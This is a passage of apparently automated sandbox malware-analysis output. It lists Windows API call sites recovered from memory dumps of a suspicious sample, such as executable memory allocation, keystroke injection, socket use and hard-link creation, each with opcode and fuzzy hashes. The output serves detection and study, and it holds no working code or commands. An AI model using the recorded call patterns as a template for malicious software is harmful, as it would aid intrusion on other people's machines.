                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F88CF4,?,00F9F910), ref: 00F890EE
                                                              • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F89100
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetModuleHandleExW$kernel32.dll
                                                              • API String ID: 2574300362-199464113
                                                              • Opcode ID: 180bb3f0625a5e0b09f543cea1f5b428b0c479dbd9ff959f965dcf80513df66e
                                                              • Instruction ID: 6027b86a16d8423f69030c32ea8197cfa6d579e3a1016694c87670d78324496f
                                                              • Opcode Fuzzy Hash: 180bb3f0625a5e0b09f543cea1f5b428b0c479dbd9ff959f965dcf80513df66e
                                                              • Instruction Fuzzy Hash: 9ED01234914717CFDB209F31D81D65676D4AF05355B15883F9486D6550E7B0C4C4E791
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: LocalTime__swprintf
                                                              • String ID: %.3d$WIN_XPe
                                                              • API String ID: 2070861257-2409531811
                                                              • Opcode ID: 03c221177af14d92b87d9608e0cf072604f0342685b73fde012bcb2955ba1b56
                                                              • Instruction ID: 9e137dcd1509a293add9016cd8d35b375054a9819aa29a98c5f0b412b5354df1
                                                              • Opcode Fuzzy Hash: 03c221177af14d92b87d9608e0cf072604f0342685b73fde012bcb2955ba1b56
                                                              • Instruction Fuzzy Hash: 7AD01273844109FAC7009B94AC89FF9777CB70C312F141452FE06D2040E265AB9CF621
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a39cb454b011c425ae597653254e3d14f2d9749e3e5fb0156f50ea51ca00c311
                                                              • Instruction ID: 060ffaf0e693ab02e9e24542f8ba40605747e3df83e3649bd75f7213c5160385
                                                              • Opcode Fuzzy Hash: a39cb454b011c425ae597653254e3d14f2d9749e3e5fb0156f50ea51ca00c311
                                                              • Instruction Fuzzy Hash: 26C17F75A04216EFCB14DFA4C884EAEBBB5FF48718B148599E805DB351DB30ED81EB90
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?), ref: 00F8E0BE
                                                              • CharLowerBuffW.USER32(?,?), ref: 00F8E101
                                                                • Part of subcall function 00F8D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F8D7C5
                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F8E301
                                                              • _memmove.LIBCMT ref: 00F8E314
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                              • String ID:
                                                              • API String ID: 3659485706-0
                                                              • Opcode ID: 2ce2883df1f9b8b7cdd0c82a5df319415d1ff514d36251bb97b280a08f534bf0
                                                              • Instruction ID: 970627943a3ed49d2805434796ae8f02ab9f4763045383f1ab43c98a3b456787
                                                              • Opcode Fuzzy Hash: 2ce2883df1f9b8b7cdd0c82a5df319415d1ff514d36251bb97b280a08f534bf0
                                                              • Instruction Fuzzy Hash: 3FC15C71A08301DFC704EF24C850A9ABBE4FF89724F14896EF8999B351D735E945DB82
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 00F880C3
                                                              • CoUninitialize.OLE32 ref: 00F880CE
                                                                • Part of subcall function 00F6D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F6D5D4
                                                              • VariantInit.OLEAUT32(?), ref: 00F880D9
                                                              • VariantClear.OLEAUT32(?), ref: 00F883AA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                              • String ID:
                                                              • API String ID: 780911581-0
                                                              • Opcode ID: fc4807f117526c5ca5504f6d4b256ad5201cf036dfc33cd8a6260f9cb00832ed
                                                              • Instruction ID: 8ec1bdbdb62ab1943ea61f71971955766f31f6a0e8e024ef8a718d7908ccb3c6
                                                              • Opcode Fuzzy Hash: fc4807f117526c5ca5504f6d4b256ad5201cf036dfc33cd8a6260f9cb00832ed
                                                              • Instruction Fuzzy Hash: 50A18D356087019FCB00EF14C891BAAB7E4BF89364F48441CF9969B3A1CB74ED45EB82
                                                              APIs
                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00FA2C7C,?), ref: 00F676EA
                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00FA2C7C,?), ref: 00F67702
                                                              • CLSIDFromProgID.OLE32(?,?,00000000,00F9FB80,000000FF,?,00000000,00000800,00000000,?,00FA2C7C,?), ref: 00F67727
                                                              • _memcmp.LIBCMT ref: 00F67748
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: FromProg$FreeTask_memcmp
                                                              • String ID:
                                                              • API String ID: 314563124-0
                                                              • Opcode ID: f91bf11b1e11aa3f6dca19e8fbe29565a6d3c81c5de765570fe71bc47eb7947a
                                                              • Instruction ID: 2f95c8258791ddf19927773bcec04c09f68575aea708f444f12a93b4d1f0470a
                                                              • Opcode Fuzzy Hash: f91bf11b1e11aa3f6dca19e8fbe29565a6d3c81c5de765570fe71bc47eb7947a
                                                              • Instruction Fuzzy Hash: 6D810D75A00209EFCB04DFA4C984EEEB7B9FF89315F204558E506EB250DB71AE46DB60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Variant$AllocClearCopyInitString
                                                              • String ID:
                                                              • API String ID: 2808897238-0
                                                              • Opcode ID: 607555fa0137ed0d5dddff303a2ad02d0915bccbaeb5f7bdf11221b2861e48f7
                                                              • Instruction ID: c9e0f767afd91d7c22a7466393c86e909557639bec5c69e1b7b68912970dc7b3
                                                              • Opcode Fuzzy Hash: 607555fa0137ed0d5dddff303a2ad02d0915bccbaeb5f7bdf11221b2861e48f7
                                                              • Instruction Fuzzy Hash: 6051C4757043029ADF24EFA5D891B7AB3E5AF45320F20C81FE596DB291DF78E881A701
                                                              APIs
                                                              • GetWindowRect.USER32(015F1378,?), ref: 00F99863
                                                              • ScreenToClient.USER32(00000002,00000002), ref: 00F99896
                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F99903
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientMoveRectScreen
                                                              • String ID:
                                                              • API String ID: 3880355969-0
                                                              • Opcode ID: c3256a7ba62bf7a81320548ac694e748285a6dba3f6a289dbc3638afa97cb067
                                                              • Instruction ID: 744ab949058778df0a6c3478c091803d0255cb421e9d5a24a04cc7f66525c17c
                                                              • Opcode Fuzzy Hash: c3256a7ba62bf7a81320548ac694e748285a6dba3f6a289dbc3638afa97cb067
                                                              • Instruction Fuzzy Hash: 32514F34E04208AFEF14CF68C980AAE7BB6FF45360F55815DF8659B2A0D771AD41EB90
                                                              APIs
                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F69AD2
                                                              • __itow.LIBCMT ref: 00F69B03
                                                                • Part of subcall function 00F69D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F69DBE
                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F69B6C
                                                              • __itow.LIBCMT ref: 00F69BC3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow
                                                              • String ID:
                                                              • API String ID: 3379773720-0
                                                              • Opcode ID: 46bdf383aeb913fff59a8d306e28ec629f8e69338730e15ceef557db4f490b88
                                                              • Instruction ID: 9720b20d1ed8e3209247c7948bdfa01bd15d49e983da6ae1847f906e75d2a768
                                                              • Opcode Fuzzy Hash: 46bdf383aeb913fff59a8d306e28ec629f8e69338730e15ceef557db4f490b88
                                                              • Instruction Fuzzy Hash: 52418670A04308ABDF11EF54DC45BFE7BB9EF84720F000059F905A7291DBB49A84EB91
                                                              APIs
                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 00F869D1
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F869E1
                                                                • Part of subcall function 00F19837: __itow.LIBCMT ref: 00F19862
                                                                • Part of subcall function 00F19837: __swprintf.LIBCMT ref: 00F198AC
                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F86A45
                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00F86A51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$__itow__swprintfsocket
                                                              • String ID:
                                                              • API String ID: 2214342067-0
                                                              • Opcode ID: 124a83a2fe34132cb8bd4bff2d802dc5fc4fd5c4eeb8e84ed090928b6f6baed9
                                                              • Instruction ID: 42bd19f954f6f451d071c0965c574931154ab9f51bb9c6d8c016307502d36f20
                                                              • Opcode Fuzzy Hash: 124a83a2fe34132cb8bd4bff2d802dc5fc4fd5c4eeb8e84ed090928b6f6baed9
                                                              • Instruction Fuzzy Hash: EA41B4757402006FEB50BF24DC96FB977A49F14B14F44801CFA19EF2C2DAB89D41AB91
                                                              APIs
                                                              • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F9F910), ref: 00F864A7
                                                              • _strlen.LIBCMT ref: 00F864D9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID:
                                                              • API String ID: 4218353326-0
                                                              • Opcode ID: bfe0700cbb166f265a2c5a60ee9404d1d9f84938ad45c75faf61a9f28248c3fd
                                                              • Instruction ID: dff8f4169ed51bf876011fe024599ef3700b3ad31ef0042e8c6170f5eab6706a
                                                              • Opcode Fuzzy Hash: bfe0700cbb166f265a2c5a60ee9404d1d9f84938ad45c75faf61a9f28248c3fd
                                                              • Instruction Fuzzy Hash: E341A635A04104ABCB14FBA4DC95FEEB7A9AF44310F148159F819DB292DB34EE44EB51
                                                              APIs
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F7B89E
                                                              • GetLastError.KERNEL32(?,00000000), ref: 00F7B8C4
                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F7B8E9
                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F7B915
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                              • String ID:
                                                              • API String ID: 3321077145-0
                                                              • Opcode ID: ea796c1dcd6a19e97b8bc0e41f30ccbcdde0290cd736c94d451e53f5767f1b02
                                                              • Instruction ID: 03a5cf62b195bb9b049a360c82a6de401c66dfa31a1326449692968dd837c674
                                                              • Opcode Fuzzy Hash: ea796c1dcd6a19e97b8bc0e41f30ccbcdde0290cd736c94d451e53f5767f1b02
                                                              • Instruction Fuzzy Hash: 86413C35A04514DFCB10EF15C854A99BBE1EF4A320F49C099ED4A9B362CB74FD41EB92
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F988DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 2fa95f45c6e5010b0b786b9503d2ceeeae3dc9925d02612bf92c0428e16992f0
                                                              • Instruction ID: c30859939260f2a94c65dc1d789565eb71e7faf97f53d58aeffdb44995e23893
                                                              • Opcode Fuzzy Hash: 2fa95f45c6e5010b0b786b9503d2ceeeae3dc9925d02612bf92c0428e16992f0
                                                              • Instruction Fuzzy Hash: 5631D234A40108AFFF249F68CC45FB877A5EB077A0F544116FA15E62A1CE31D942BB52
                                                              APIs
                                                              • ClientToScreen.USER32(?,?), ref: 00F9AB60
                                                              • GetWindowRect.USER32(?,?), ref: 00F9ABD6
                                                              • PtInRect.USER32(?,?,00F9C014), ref: 00F9ABE6
                                                              • MessageBeep.USER32(00000000), ref: 00F9AC57
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                              • String ID:
                                                              • API String ID: 1352109105-0
                                                              • Opcode ID: 879b3ec9fddad4ba95f1192367c0203d4e2405d40f6e20833ab97403fd5455d9
                                                              • Instruction ID: 810123b34dc568860b3ec6182aecde155817032ae3388fd56a7443e5fdc93b87
                                                              • Opcode Fuzzy Hash: 879b3ec9fddad4ba95f1192367c0203d4e2405d40f6e20833ab97403fd5455d9
                                                              • Instruction Fuzzy Hash: 2D415B31A002199FEF11DF58D884B697BF6FB89710F1880AAE815DF364D731E841EB92
                                                              APIs
                                                              • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F70B27
                                                              • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F70B43
                                                              • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F70BA9
                                                              • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F70BFB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 71d28485da9118de698d48542070d893fd028db6bd6e34e73dba682fac59fbdf
                                                              • Instruction ID: 6b84e2cb652e5524c32306361c134450459e580d66d52ffa5ae648fd99e4dea7
                                                              • Opcode Fuzzy Hash: 71d28485da9118de698d48542070d893fd028db6bd6e34e73dba682fac59fbdf
                                                              • Instruction Fuzzy Hash: A4310870D40218EAEB318B2D8C05BFABBA6AF85324F08C25BE499D11D1CB758A44B757
                                                              APIs
                                                              • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00F70C66
                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F70C82
                                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F70CE1
                                                              • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00F70D33
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
                                                              • API ID: KeyboardState$InputMessagePostSend
                                                              • String ID:
                                                              • API String ID: 432972143-0
                                                              • Opcode ID: 2a9968e3d21b51a2c5c869a9b57bb2c4eec70beb4288b4a62d1c2708dddca4d2
                                                              • Instruction ID: 69ac7618e30b51d6ae81f7017a7da2877f180ca294abdec48c5c78796030adb2
                                                              • Opcode Fuzzy Hash: 2a9968e3d21b51a2c5c869a9b57bb2c4eec70beb4288b4a62d1c2708dddca4d2
                                                              • Instruction Fuzzy Hash: F7310830E40318EEFB318B658C047BEBB66AF45320F04C36BE489911D1CB795955A753
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F461FB
                                                              • __isleadbyte_l.LIBCMT ref: 00F46229
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F46257
                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F4628D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2128768648.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                              • Associated: 00000000.00000002.2128752992.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000F9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128823302.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128869041.0000000000FCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2128888320.0000000000FD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_f10000_z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.jbxd
                                                              Similarity
